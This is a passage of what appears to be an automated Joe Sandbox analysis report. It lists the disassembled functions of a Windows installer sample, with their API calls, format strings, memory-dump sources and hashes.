                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                          Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                          Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                          Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: Version
                                                                                                                                                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                          Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                          Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                          Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
